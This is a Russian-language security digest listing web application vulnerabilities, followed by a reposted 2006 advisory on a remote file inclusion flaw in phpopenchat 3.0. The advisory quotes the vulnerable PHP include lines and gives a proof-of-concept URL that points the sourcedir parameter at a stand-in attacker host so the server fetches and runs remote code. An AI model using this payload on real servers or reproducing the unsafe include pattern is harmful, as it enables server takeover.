Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[SA21787] Attachment Mod Attachment Script Insertion Vulnerability

[SA21789] PhpLeague "id_joueur" SQL Injection Vulnerability

SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities

From:	stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date:	7 сентября 2006 г.
Subject:	WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

[W]orld [D]efacers Team
--------------------Summary----------------

eVuln ID: WD23

Vendor:  phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http:
//host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)